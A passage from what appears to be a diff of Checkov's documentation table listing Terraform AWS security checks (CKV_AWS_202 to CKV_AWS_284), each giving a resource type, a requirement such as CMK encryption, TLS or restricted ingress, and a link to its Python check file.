[MemoryDBEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBEncryptionWithCMK.py) | +| 293 | CKV_AWS_202 | resource | aws_memorydb_cluster | Ensure MemoryDB data is encrypted in transit | Terraform | [MemoryDBClusterIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBClusterIntransitEncryption.py) | +| 294 | CKV_AWS_203 | resource | aws_fsx_openzfs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | 
[FSXOpenZFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOpenZFSFileSystemEncryptedWithCMK.py) | +| 295 | CKV_AWS_204 | resource | aws_ami | Ensure AMIs are encrypted using KMS CMKs | Terraform | [AMIEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMIEncryption.py) | +| 296 | CKV_AWS_205 | resource | aws_ami_launch_permission | Ensure to Limit AMI launch Permissions | Terraform | [AMILaunchIsShared.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMILaunchIsShared.py) | +| 297 | CKV_AWS_206 | resource | aws_api_gateway_domain_name | Ensure API Gateway Domain uses a modern security Policy | Terraform | [APIGatewayDomainNameTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDomainNameTLS.py) | +| 298 | CKV_AWS_207 | resource | aws_mq_broker | Ensure MQ Broker minor version updates are enabled | Terraform | [MQBrokerMinorAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerMinorAutoUpgrade.py) | +| 299 | CKV_AWS_208 | resource | aws_mq_broker | Ensure MQ Broker version is current | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) | +| 300 | CKV_AWS_208 | resource | aws_mq_configuration | Ensure MQ Broker version is current | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) | +| 301 | CKV_AWS_209 | resource | aws_mq_broker | Ensure MQ broker encrypted by KMS using a customer managed Key (CMK) | Terraform | [MQBrokerEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerEncryptedWithCMK.py) | +| 302 | CKV_AWS_210 | resource | 
aws_batch_job_definition | Batch job does not define a privileged container | Terraform | [BatchJobIsNotPrivileged.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BatchJobIsNotPrivileged.py) | +| 303 | CKV_AWS_211 | resource | aws_db_instance | Ensure RDS uses a modern CaCert | Terraform | [RDSCACertIsRecent.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSCACertIsRecent.py) | +| 304 | CKV_AWS_212 | resource | aws_dms_replication_instance | Ensure DMS replication instance is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DMSReplicationInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceEncryptedWithCMK.py) | +| 305 | CKV_AWS_213 | resource | aws_load_balancer_policy | Ensure ELB Policy uses only secure protocols | Terraform | [ELBPolicyUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBPolicyUsesSecureProtocols.py) | +| 306 | CKV_AWS_214 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted at rest | Terraform | [AppsyncAPICacheEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionAtRest.py) | +| 307 | CKV_AWS_215 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted in transit | Terraform | [AppsyncAPICacheEncryptionInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionInTransit.py) | +| 308 | CKV_AWS_216 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution is enabled | Terraform | [CloudfrontDistributionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEnabled.py) | +| 309 | CKV_AWS_217 | resource | 
aws_api_gateway_deployment | Ensure Create before destroy for API deployments | Terraform | [APIGatewayDeploymentCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDeploymentCreateBeforeDestroy.py) | +| 310 | CKV_AWS_218 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is using latest TLS | Terraform | [CloudsearchDomainTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainTLS.py) | +| 311 | CKV_AWS_219 | resource | aws_codepipeline | Ensure CodePipeline Artifact store is using a KMS CMK | Terraform | [CodePipelineArtifactsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodePipelineArtifactsEncrypted.py) | +| 312 | CKV_AWS_220 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is using https | Terraform | [CloudsearchDomainEnforceHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainEnforceHttps.py) | +| 313 | CKV_AWS_221 | resource | aws_codeartifact_domain | Ensure CodeArtifact Domain is encrypted by KMS using a customer managed Key (CMK) | Terraform | [CodeArtifactDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeArtifactDomainEncryptedWithCMK.py) | +| 314 | CKV_AWS_222 | resource | aws_dms_replication_instance | Ensure DMS replication instance gets all minor upgrade automatically | Terraform | [DMSReplicationInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceMinorUpgrade.py) | +| 315 | CKV_AWS_223 | resource | aws_ecs_cluster | Ensure ECS Cluster enables logging of ECS Exec | Terraform | [ECSClusterLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEnabled.py) | +| 316 | 
CKV_AWS_224 | resource | aws_ecs_cluster | Ensure ECS Cluster logging is enabled and client to container communication uses CMK | Terraform | [ECSClusterLoggingEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py) | +| 317 | CKV_AWS_225 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting caching is enabled | Terraform | [APIGatewayMethodSettingsCacheEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEnabled.py) | +| 318 | CKV_AWS_226 | resource | aws_db_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) | +| 319 | CKV_AWS_226 | resource | aws_rds_cluster_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) | +| 320 | CKV_AWS_227 | resource | aws_kms_key | Ensure KMS key is enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyIsEnabled.py) | +| 321 | CKV_AWS_228 | resource | aws_elasticsearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) | +| 322 | CKV_AWS_228 | resource | aws_opensearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) | +| 323 | CKV_AWS_229 | resource | aws_network_acl | 
Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) | +| 324 | CKV_AWS_229 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) | +| 325 | CKV_AWS_230 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) | +| 326 | CKV_AWS_230 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) | +| 327 | CKV_AWS_231 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) | +| 328 | CKV_AWS_231 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) | +| 329 | CKV_AWS_232 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) | +| 330 | CKV_AWS_232 | resource | 
aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) | +| 331 | CKV_AWS_233 | resource | aws_acm_certificate | Ensure Create before destroy for ACM certificates | Terraform | [ACMCertCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertCreateBeforeDestroy.py) | +| 332 | CKV_AWS_234 | resource | aws_acm_certificate | Verify logging preference for ACM certificates | Terraform | [ACMCertSetLoggingPreference.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertSetLoggingPreference.py) | +| 333 | CKV_AWS_235 | resource | aws_ami_copy | Ensure that copied AMIs are encrypted | Terraform | [AMICopyIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyIsEncrypted.py) | +| 334 | CKV_AWS_236 | resource | aws_ami_copy | Ensure AMI copying uses a CMK | Terraform | [AMICopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyUsesCMK.py) | +| 335 | CKV_AWS_237 | resource | aws_api_gateway_rest_api | Ensure Create before destroy for API Gateway | Terraform | [APIGatewayCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCreateBeforeDestroy.py) | +| 336 | CKV_AWS_238 | resource | aws_guardduty_detector | Ensure that GuardDuty detector is enabled | Terraform | [GuarddutyDetectorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GuarddutyDetectorEnabled.py) | +| 337 | CKV_AWS_239 | resource | aws_dax_cluster | Ensure DAX cluster endpoint is using TLS | Terraform | 
[DAXEndpointTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEndpointTLS.py) | +| 338 | CKV_AWS_240 | resource | aws_kinesis_firehose_delivery_stream | Ensure Kinesis Firehose delivery stream is encrypted | Terraform | [KinesisFirehoseDeliveryStreamSSE.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamSSE.py) | +| 339 | CKV_AWS_241 | resource | aws_kinesis_firehose_delivery_stream | Ensure that Kinesis Firehose Delivery Streams are encrypted with CMK | Terraform | [KinesisFirehoseDeliveryStreamUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamUsesCMK.py) | +| 340 | CKV_AWS_242 | resource | aws_mwaa_environment | Ensure MWAA environment has scheduler logs enabled | Terraform | [MWAASchedulerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAASchedulerLogsEnabled.py) | +| 341 | CKV_AWS_243 | resource | aws_mwaa_environment | Ensure MWAA environment has worker logs enabled | Terraform | [MWAAWorkerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWorkerLogsEnabled.py) | +| 342 | CKV_AWS_244 | resource | aws_mwaa_environment | Ensure MWAA environment has webserver logs enabled | Terraform | [MWAAWebserverLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWebserverLogsEnabled.py) | +| 343 | CKV_AWS_245 | resource | aws_db_instance_automated_backups_replication | Ensure replicated backups are encrypted at rest using KMS CMKs | Terraform | [RDSInstanceAutoBackupEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceAutoBackupEncryptionWithCMK.py) | +| 344 | CKV_AWS_246 | resource | aws_rds_cluster_activity_stream | Ensure RDS Cluster activity 
streams are encrypted using KMS CMKs | Terraform | [RDSClusterActivityStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterActivityStreamEncryptedWithCMK.py) | +| 345 | CKV_AWS_247 | resource | aws_elasticsearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) | +| 346 | CKV_AWS_247 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) | +| 347 | CKV_AWS_248 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) | +| 348 | CKV_AWS_248 | resource | aws_opensearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) | +| 349 | CKV_AWS_249 | resource | aws_ecs_task_definition | Ensure that the Execution Role ARN and the Task Role ARN are different in ECS Task definitions | Terraform | [ECSTaskDefinitionRoleCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionRoleCheck.py) | +| 350 | CKV_AWS_250 | resource | aws_db_instance | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | 
[RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) | +| 351 | CKV_AWS_250 | resource | aws_rds_cluster | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) | +| 352 | CKV_AWS_251 | resource | aws_cloudtrail | Ensure CloudTrail logging is enabled | Terraform | [CloudtrailEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEnableLogging.py) | +| 353 | CKV_AWS_252 | resource | aws_cloudtrail | Ensure CloudTrail defines an SNS Topic | Terraform | [CloudtrailDefinesSNSTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailDefinesSNSTopic.py) | +| 354 | CKV_AWS_253 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted | Terraform | [DLMEventsCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryption.py) | +| 355 | CKV_AWS_254 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted with Customer Managed Key | Terraform | [DLMEventsCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryptionWithCMK.py) | +| 356 | CKV_AWS_255 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region schedules are encrypted | Terraform | [DLMScheduleCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryption.py) | +| 357 | CKV_AWS_256 | resource | aws_dlm_lifecycle_policy | 
Ensure DLM cross region schedules are encrypted using a Customer Managed Key | Terraform | [DLMScheduleCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryptionWithCMK.py) | +| 358 | CKV_AWS_257 | resource | aws_codecommit_approval_rule_template | Ensure CodeCommit branch changes have at least 2 approvals | Terraform | [CodecommitApprovalsRulesRequireMin2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodecommitApprovalsRulesRequireMin2.py) | +| 359 | CKV_AWS_258 | resource | aws_lambda_function_url | Ensure that Lambda function URLs AuthType is not None | Terraform | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionURLAuth.py) | +| 360 | CKV_AWS_259 | resource | aws_cloudfront_response_headers_policy | Ensure CloudFront response header policy enforces Strict Transport Security | Terraform | [CloudFrontResponseHeaderStrictTransportSecurity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudFrontResponseHeaderStrictTransportSecurity.py) | +| 361 | CKV_AWS_260 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 362 | CKV_AWS_260 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 363 | CKV_AWS_260 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | 
[SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 364 | CKV_AWS_261 | resource | aws_alb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) | +| 365 | CKV_AWS_261 | resource | aws_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) | +| 366 | CKV_AWS_262 | resource | aws_kendra_index | Ensure Kendra index Server side encryption uses CMK | Terraform | [KendraIndexSSEUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KendraIndexSSEUsesCMK.py) | +| 367 | CKV_AWS_263 | resource | aws_appflow_flow | Ensure AppFlow flow uses CMK | Terraform | [AppFlowUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowUsesCMK.py) | +| 368 | CKV_AWS_264 | resource | aws_appflow_connector_profile | Ensure AppFlow connector profile uses CMK | Terraform | [AppFlowConnectorProfileUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowConnectorProfileUsesCMK.py) | +| 369 | CKV_AWS_265 | resource | aws_keyspaces_table | Ensure Keyspaces Table uses CMK | Terraform | [KeyspacesTableUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KeyspacesTableUsesCMK.py) | +| 370 | CKV_AWS_266 | resource | aws_db_snapshot_copy | Ensure DB Snapshot copy uses CMK | Terraform | 
[DBSnapshotCopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotCopyUsesCMK.py) | +| 371 | CKV_AWS_267 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's model is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ComprehendEntityRecognizerModelUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerModelUsesCMK.py) | +| 372 | CKV_AWS_268 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ComprehendEntityRecognizerVolumeUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerVolumeUsesCMK.py) | +| 373 | CKV_AWS_269 | resource | aws_connect_instance_storage_config | Ensure Connect Instance Kinesis Video Stream Storage Config uses CMK | Terraform | [ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py) | +| 374 | CKV_AWS_270 | resource | aws_connect_instance_storage_config | Ensure Connect Instance S3 Storage Config uses CMK | Terraform | [ConnectInstanceS3StorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceS3StorageConfigUsesCMK.py) | +| 375 | CKV_AWS_271 | resource | aws_dynamodb_table_replica | Ensure DynamoDB table replica KMS encryption uses CMK | Terraform | [DynamoDBTableReplicaKMSUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTableReplicaKMSUsesCMK.py) | +| 376 | CKV_AWS_272 | resource | aws_lambda_function | Ensure AWS Lambda function is configured to validate code-signing | Terraform | 
[LambdaCodeSigningConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaCodeSigningConfigured.py) |
+| 377 | CKV_AWS_273 | resource | aws_iam_user | Ensure access is controlled through SSO and not AWS IAM defined users | Terraform | [IAMUserNotUsedForAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserNotUsedForAccess.py) |
+| 378 | CKV_AWS_274 | resource | aws_iam_group_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) |
+| 379 | CKV_AWS_274 | resource | aws_iam_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) |
+| 380 | CKV_AWS_274 | resource | aws_iam_role | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) |
+| 381 | CKV_AWS_274 | resource | aws_iam_role_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) |
+| 382 | CKV_AWS_274 | resource | aws_iam_user_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) |
+| 383 | CKV_AWS_274 | resource | 
aws_ssoadmin_managed_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) |
+| 384 | CKV_AWS_275 | data | aws_iam_policy | Disallow policies from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMManagedAdminPolicy.py) |
+| 385 | CKV_AWS_276 | resource | aws_api_gateway_method_settings | Ensure Data Trace is not enabled in API Gateway Method Settings | Terraform | [APIGatewayMethodSettingsDataTrace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsDataTrace.py) |
+| 386 | CKV_AWS_277 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) |
+| 387 | CKV_AWS_277 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) |
+| 388 | CKV_AWS_277 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) |
+| 389 | CKV_AWS_278 | resource | aws_memorydb_snapshot | Ensure MemoryDB snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | 
[MemoryDBSnapshotEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBSnapshotEncryptionWithCMK.py) |
+| 390 | CKV_AWS_279 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is securely encrypted | Terraform | [NeptuneClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncrypted.py) |
+| 391 | CKV_AWS_280 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterSnapshotEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncryptedWithCMK.py) |
+| 392 | CKV_AWS_281 | resource | aws_redshift_snapshot_copy_grant | Ensure RedShift snapshot copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py) |
+| 393 | CKV_AWS_282 | resource | aws_redshiftserverless_namespace | Ensure that Redshift Serverless namespace is encrypted by KMS using a customer managed key (CMK) | Terraform | [RedshiftServerlessNamespaceKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftServerlessNamespaceKMSKey.py) |
+| 394 | CKV_AWS_283 | data | aws_iam_policy_document | Ensure no IAM policies documents allow ALL or any AWS principal permissions to the resource | Terraform | [IAMPublicActionsPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPublicActionsPolicy.py) |
+| 395 | CKV_AWS_284 | resource | aws_sfn_state_machine | Ensure State Machine has X-Ray tracing enabled | Terraform | 
[StateMachineXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineXray.py) |
